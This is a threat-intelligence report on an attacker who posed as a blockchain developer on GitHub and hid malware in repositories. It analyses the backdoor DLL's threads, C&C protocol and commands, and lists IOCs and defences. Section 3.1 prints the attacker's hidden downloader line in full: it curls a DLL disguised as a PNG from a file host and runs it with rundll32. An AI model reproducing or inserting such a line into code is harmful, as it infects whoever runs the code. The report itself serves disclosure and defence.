Threat Intelligence

An attacker, disguised as a job seeker, distributing malware on GitHub

EnkiWhiteHat

2025. 6. 4.

🌐You can also read this post in Korean

Executive Summary

We found and analyzed two repositories on GitHub that contained the same malicious code.
The attacker used various techniques to make the repositories appear legitimate, such as copying real repositories or hiding malicious code using long white spaces.
The final backdoor malware operated by multiple threads interacting with each other and used IOCP (Input/Output Completion Port) for communication with the C&C server.
By investigating the attacker's repositories, we identified the changes in their attack methods and found that the attacker posed as a full-stack and blockchain developer while searching for employment.
The attacker is not only inserting malicious code into repositories but also preparing to distribute malware disguised as a legitimate hiring process by creating a phishing site.

1. Overview

GitHub is a platform used by developers to share their work or portfolios and collaborate with others. However, there have been various cases in which attackers disguised themselves as researchers, developers, or job seekers and make repositories appear legitimate, only to insert malicious scripts into certain files or upload malware disguised as 1-day vulnerability PoCs to induce infections.

There have been cases where North Korean IT workers created fake profiles on LinkedIn and GitHub, disguising themselves as developers to seek employment with the purpose of earning foreign currency and stealing information.

Like this, GitHub is being abused by attackers who combine it with social engineering techniques to deceive recruiters and ordinary users.

caption - The attacker's job-seeking activity

This report details the activities, malware and related phishing attacks of attackers who disguised themselves as job seekers and inserted malicious scripts into certain repositories.

2. Attacker Profile

The attacker used the GitHub account “RealToma,” decorating the profile to appear as a legitimate user with an impressive career background.

caption - RealToma Github profile

The attacker also used Linktree, a link-in-bio service to organize and display their email, resume, GitHub, LinkedIn, and other links on a single page.

caption - Attacker’s linktree

By checking the attacker's account on the blockchain recruitment platform web3.career, we can see that the attacker is job hunting under the name Thomas Ken, claiming to be a full-stack and blockchain developer with 12 years of experience.

caption - Attacker’s web3.career profile

3. Malware Analysis

3.1. Github Repository

Among the repositories created by the attacker, there is one for a Telegram bot that automatically supports login and payment for a subscription service.

caption - One of attacker’s repository Ly_AutoPayBot

In this repository, a malicious script was inserted into the src/helper/logger.ts file, which is responsible for logging functionality. Although the legitimate code ends at line 46, the malicious script is hidden using a large blank space at line 368.

caption - Malicious script found in Ly_AutoPayBot

The malicious script is executed every time logger.ts is imported. Therefore, users who clone the LyAutoPayBot repository and run the bot are infected with the malware.

The script downloads and executes malware from catbox, a free file hosting site. The full command is as follows:

import {exec} from 'child_process'; exec(`cmd.exe /C "curl -s <https://files.catbox.moe/mur3el.png> -o %temp%/temp.png && START /B rundll32.exe %temp%/temp.png DllRegisterServer`");

The file mur3el.png, which is downloaded and executed, is actually a DLL file written in C++. Which has a malicious behavior embedded within the DllRegisterServer function.

3.2. mur3el.png

Operation

The file mur3el.png creates two additional threads, and along with the PrimaryThread generated at program startup, a total of three threads interact to carry out malicious behavior. The functions of each thread are summarized in the table below.

| Thread name | Functions |
| --- | --- |
| PrimaryThread | Malware initialization and termination handling |
| SendThread | Send messages to the C&C server |
| RecvThread | Receive data from the C&C server and perform backdoor actions

caption - Thread Features

The interaction process between threads begins with the PrimaryThread performing the initial setup, followed by the sequential creation and execution of the SendThread and RecvThread**.** The SendThread sends the process ID and command execution results to the C&C server, while the RecvThread is configured as an IOCP Worker Thread, receiving commands from the C&C server and processing them.

This process is repeated in a loop, and when a termination command is received, the PrimaryThread deactivates each thread and closes the socket connection. The key variables used in this process is described in the table below.

| Variable name | Description |
| --- | --- |
| MalwareShutdown | Shutdown the malware when the value is 1 |
| MsgDeque | A deque to save data that will be sent to the C&C server |
| SocketFlag | C&C socket status flag-n(1: Connection request, 2: Message send,-n3: Waiting for response, 4: Disconnect) |
| ShutdownFlag | C&C socket shutdown flag-n(2: SetLastError function call (indicates socket error),-n4: I/O operation realse, terminate socket send/receive tasks) |
| SendThreadRunFlag | Terminate SendThread when the value is 1

caption - Variable descriptions

The interaction between threads and the C&C server communication process are illustrated in the sequence diagram shown below.

caption - The interaction between threads and the C&C server communication process

C&C Communication

Communication with the C&C server is carried out through HTTP POST requests, using Windows' Input/Output Completion Port (IOCP) functionality. In this process, the Overlapped structure of IOCP is extended for use, allowing the transmission and reception of a MsgType value during communication. The MsgType can be one of 2, 3, 8, and it is used by the RecvThread.

Requests to the C&C server using IOCP are carried out as shown in the diagram below.

caption - HTTP POST request process

The detailed process is as follows:

During the TCP three-way handshake with the C&C server, the SYN, ACK packet is also delivered to the RecvThread due to the use of IOCP functionality.
The RecvThread receives the SYN, ACK packet and sets the SocketFlag to 2.
Afterward, the SendThread, which completes the three-way handshake by sending the final ACK packet, checks that the SocketFlag is set to 2 and sends an HTTP POST request to the C&C server.

Encryption/Decryption Method

The malware uses Base64 and MT19937 for decrypting internal string data and for encrypting/decrypting data sent to and received from the C&C server. Notably, different MT19937 seed values are used for each of these processes.

The internal string decryption process is as follows:

Base64 decode the encrypted data
Use the first 4 bytes of the decoded data as MT19937 seed value
Perform 1-byte xor operation with MT19937 output value

caption - String data decryption function

C&C received data decryption process is as follows:

Base64 decode the encrypted data
Use 0x4ACAB58C as MT19937 seed value
Perform 1-byte xor operation with MT19937 output value

caption - C&C received data decryption function

C&C send data encryption process is as follows:

Use 0x4ACAB58C as MT19937 seed value
Perform 1-byte xor operation with MT19937 output value
Base64 encode the encrypted data

PrimaryThread

The PrimaryThread creates a mutex named "txtdobw" to check whether the malware is already running. If the mutex is successfully created, the malware generates an ID to identify the infected system by using the volume GUID path of the compromised system.

caption - ID creation function

Once the ID generation is complete, the malware creates the SendThread and configures the RecvThread as an IOCP Worker Thread, so that when data is received from the C&C server, it is dispatched to the RecvThread.

After that, the malware collects information about the infected system and adds it to the MsgDeque. This information is then sent to the C&C server upon the initial connection. The collected information is as follows:

User name
Computer name
Current process id
File data of msci.cng

The msci.cng file is located in the directory where the malware is installed, and a routine for creating this file exists in the RecvThread. An integer value is stored in the file. When the malware collects system information, the file does not yet exist, so the value is set to 0 by default.

Finally, the malware continuously calls the Sleep function and waits until the value of MalwareShutdown is set to 1. Once it is set to 1, the malware terminates the socket connection with the C&C server and terminates both the SendThread and RecvThread

SendThread

The SendThread either attempts to connect to the C&C server or transmits data stored in the MsgDeque, depending on the value of the SocketFlag. It continues running in an infinite loop until the SendThreadRunFlag is set to 1.

The actions performed according to the value of SocketFlag are described in the table below.

| SocketFlag | Action |
| --- | --- |
| 1 | Request connection |
| 2 | Send data stored in MsgDeque through HTTP POST request-n(remove the data from MsgDeque after transmission) |
| 3 | Call the Sleep function until the SocketFlag is changed |
| 4 | Close connection and call the Sleep function until data is stored in the MsgDeque

caption - Acting on SocketFlags

RecvThread

The RecvThread performs malicious actions based on the data received from the C&C server.

The actions performed based on the MsgType value in the received data are described in the table below.

| MsgType | Action |
| --- | --- |
| 2 | Set SocketFlag to 2 (Send message) |
| 3 | Decrypt data received from the C&C server and perform malicious actions according to the command code |
| 8 | set SocketFlag to 4 (Disconnect)

caption - Acting on MsgType

When MsgType is 3, the received data must satisfy the following conditions. If the conditions are satisfied, the RecvThread decrypts the data and performs the following actions. Otherwise, it terminates the socket connection.

Data starts with “OK”
Data following “OK” does not start with “<!DOCTYPE”

The actions performed based on the command codes are described in the table below.

| Command Code | Action |
| --- | --- |
| 0x10010 | Collect information from the infected system |
| 0x10028 | Collect filenames of running processes |
| 0x10022 | Change TCP keepalive time (Maximum of 2 minutes) |
| 0x10015 | Set MalwareShutdown to 1 |
| 0x10025 | Write received data to the msci.cng file and collect information from the infected system |
| 0x10003 | Execute command |
| 0x10006 | Allocate heap memory |
| 0x10007 | Copy the code to be injected to heap memory |
| 0x10008 | Perform process injection |
| 0x1000c | Free heap memory |
| 0x1001B | Close socket connection

caption - Acting on Command Code

4. Attack History

The attacker modified the malicious script twice over a period of approximately four months, from October 2024 to February 2025. The attacker distributed malware using a different account and modified the malicious script embedded in files uploaded to GitHub to make detection more difficult. The final malware exhibited no changes in behavior, and the hash of the .reloc section remained identical.

In May 2025, the attacker linked the GitHub account used for malware distribution to a phishing site. This revealed that the attacker was not only distributing malware via GitHub and seeking employment as a blockchain developer, but also engaging in phishing attacks.

4.1. RealToma Account

In October 2024, the malicious script found in Ly_AutoPayBot repository of RealToma were not obfuscated and only performed the action of downloading and executing malware.

caption - Malicious script found in Ly_AutoPayBot

The RealToma account was deleted between late March and early April 2025.

caption - 404 error shown when accessing the RealToma account link

4.2. mthomas0802 Account

In February 2025, the attacker used another GitHub account in addition to the RealToma account.

caption - mthomas0802 Github profile

This account forked the “Uniswap V3 Market Maker Trading Bot” repository and inserted malicious scripts into the mm.js file.

caption - jamesbachini – Market-Maker-Bot repository

caption - The attacker made repository

After the RealToma account was deleted, the mercury-swap organization was added to the following list of the mthomas0802 account.

caption - mthomas0802 account’s following list

caption - mercury-swap group follower list

4.3. L34rnT0C0d3 Account

The L34rnT0C0d3 account, together with the mthomas0802 account, is one of the two followers of the mercury-swap organization. Looking at the repository list of this account, there is an AutoPayBot repository which has a similar name to Ly_AutoPayBot from the RealToma account.

caption - L34rnT0C0d3 account Github profile

This repository has the same structure as the Ly_AutoPayBot repository from the RealToma account.

caption - L34rnT0C0d3 account’s AutoPayBot repository

Examining the src/helper/logger.ts file In the AutoPayBot repository reveals that a malicious script has been inserted at the same location as in the Ly_AutoPayBot repository.

caption - Malicious script inserted in AutoPayBot repository

The inserted script is identical to the one found in the Ly_AutoPayBot repository.

4.4. Changes in the malicious script

In the mm.js file of the attacker's Market-Maker-Bot repository, a malicious script can be found on the second line with a long white space to hide it.

caption - Malicious script inserted mm.js

In the “RealToma - Ly_AutoPayBot” repository, the malicious script was not obfuscated, but in the “mthomas0802 - Market-Maker-Bot” repository, the malicious script was obfuscated using the JavaScript Obfuscator Tool.

There was also a change in the behavior of the malicious script. In this attack, a routine was added to collect the infected system’s OS information and send it to the C&C server. The collected information is as follows:

[hostname] – [os type]([platform] [architecture] [os release version])

caption - Deobfuscated script

Additionally, the attacker modified the malicious script. The method of downloading the malware, which previously used catbox, was changed to use Dropbox, and the strings within the malicious script were encoded using Base64.

caption - Deobfuscated and base64 decoded script(downloads malware from dropbox)

The C&C server address used for uploading infected system information was also changed.

Before change: 166.88.90[.]143
After change: 166.88.117[.]246

The C&C server address that the downloaded malware communicates with has also changed. The malware downloaded using catbox (RealToma, mthomas0802) and the malware downloaded using Dropbox (mthomas0802) each have different C&C server addresses.

Before change: hxxp://166.88.90[.]143/ms/edgeLogo.webp
After change: hxxp://166.88.117[.]246/blogs/21549876546523165464

During this process, the attacker added an email address to their GitHub account.

caption - Email address found in attacker’s Github profile

In addition to changes in the attack, the attacker also manipulated the commit log when creating the repository. Although the repository creation date is February 28, 2025, checking the commit log reveals that the commits are dated 2023. This is consistent with the commit log of the jamesbachini account's repository.

caption - Market-Maker-Bot repository creation date

caption - Market-Maker-Bot commit log

4.5. Evidence of phishing attack preparation

On the profile of the mercury-swap organization followed by the attacker’s GitHub account, there is a link leading to a cryptocurrency trading site named "Mercury Swap," as shown below.

caption - Mercury Swap site

The Mercury Swap site is a phishing site modeled after Cow Swap, a trading interface built on the Cow Protocol. Its UI and functionality closely resemble those of the legitimate Cow Swap site.

caption - CoW Swap site

Clicking the "Connect Wallet" button on the phishing site allows the user to select one of four cryptocurrency wallets to connect. If the user connects their wallet on this site, the attacker could potentially withdraw funds from the user's wallet.

caption - Popup for wallet connection

On May 28, a post was made on the Mercury Swap X account announcing a front-end developer recruitment opportunity. This could potentially be a malware distribution attack targeting job seekers under the guise of a legitimate hiring process.

caption - Developer recruitment post on Mercury Swap X

There are various known cases of malware distribution attacks targeting job seekers, such as the "Contagious Interview" and "Operation DreamJob" attacks, so special caution is needed.

The Contagious Interview campaign involves attackers approaching job seekers and, during the interview process, tricking them into downloading and executing a malicious NPM package under the pretext of a coding test or similar task. The campaign has been carried out over a long period using various methods, such as disguising malware as a video interview application to get victims to install it.

caption - Contagious Interview attack flow made by Unit42

Operation DreamJob is a campaign attributed to the Lazarus Group, in which attackers impersonate job offers and deliver documents including malwares to execute their attacks.

caption - Operation DreamJob attack flow made by ClearSky

5. Course of Action

For individual users, it is important to develop the habit of checking code changes and conducting direct code reviews when using open-source software. Special caution is necessary, as repositories may appear legitimate and trustworthy on the surface but could contain malicious scripts internally.

For organizations, caution is required from two perspectives: recruitment and open-source usage. Measures to prevent potential risks are described below.

recruitment
- Hiring an attacker disguised as a job candidate can lead to internal security threats. Therefore, it is essential to strengthen profile and identity verification during the recruitment process.
- Attackers generate fake images using deepfake technology. Verify if photos from resumes, portfolios, or LinkedIn profiles have been artificially altered using AI.
- Conduct thorough cross-verification, such as confirming project participation and verifying previous employment history.
Open-source usage
- Use only official repositories or open-source software approved internally by the organization.
- Check commit logs and code change histories.

6. Conclusion

This report details the case which an attacker disguised themselves as a job seeker on GitHub and distributed malware. The attacker replicated verified repositories and inserted malicious scripts into only some of the files to distribute the malware. Additionally, they manipulated followers, following count, and contribution statistics to gain the trust of other users.

Although the RealToma account, where the first malicious script was discovered, has disappeared, the mthomas0802 and L34rnT0C0d3 accounts still exist. And it has been confirmed that the attacker is attempting various attacks, including phishing attacks and malware distribution disguised as recruitment campaigns, in addition to spreading malware through GitHub.

In other countries, remote hiring and telecommuting are more active compared to the domestic environment, and there have been reported cases of people concealing their nationality and identity to gain employment at IT companies. Although no related cases have been reported domestically so far, the potential for such threats to emerge is high, so special caution is needed.

7. Appendix

7.1. MITRE ATT&CK

| Tactics | Techniques |
| --- | --- |
| Execution | T1059.003: Command and Scripting Interpreter: Windows Command Shell-nT1059.007: Command and Scripting Interpreter: JavaScript |
| Defense Evasion | T1027.010: Obfuscated Files or Information: Command Obfuscation-nT1140: Deobfuscate/Decode Files or Information-nT1222.001: File and Directory Permissions Modification: Windows File and Directory Permissions Modification-nT1055.009: Process Injection: Proc Memory |
| Command and Control | T1132:001: DataEncoding: Standard Encoding-nT1573.001: Encrypted Channel: Symmetric Cryptography-nT1571: Non-Standard Port-nT1071.001: Application Layer Protocol: Web Protocols-nT1102: Web Service |
| Exfiltration | T1041: Exfiltration Over C2 Channel |
| Impact | T1657: Financial Theft-nT1565.001: Stored Data Manipulation

caption - MITRE ATT&CK

7.2. IOCs

sha256

6ac3bd5e67f5ba1f8effbb53d25078e11ba3dd3d3d5046f5409d653c73db5d59
5527f0acb4755e4402434f84c0aac602260e0736f7fdb62cdc329955d47ffe3b
7790c55c5dded39c0a6a0eabf05665ce96762047db20ae8e472715461080237d
8b6d6807213c21c84192cc697d96396eced341f342161045df990830d371b70c
13412b54e3e8f30d3179e54cc653dc651e8cbe43d625c96451942910c91e76b9
52046ad374041f0cabc47e897e10de86b64997ed6da8123d067dac7ead5343b7

C&C

hxxp://166.88.90[.]143:12321
hxxp://166.88.90[.]143/ms/edgeLogo.webp
hxxp://166.88.117[.]246:12321
hxxp://166.88.117[.]246/blogs/21549876546523165464

Mutex

txtdobw

Backdoor Download Link

hxxps://files.catbox[.]moe/zxmneq.png
hxxps://files.catbox[.]moe/mur3el.png
hxxps://www.dropbox[.]com/scl/fi/edq1ecio6zr2ophnnv3l7/89373.png?rlkey=whwftc8qf452xku7c8ya3cd5o&st=bcmppt7i&dl=0

Github Repository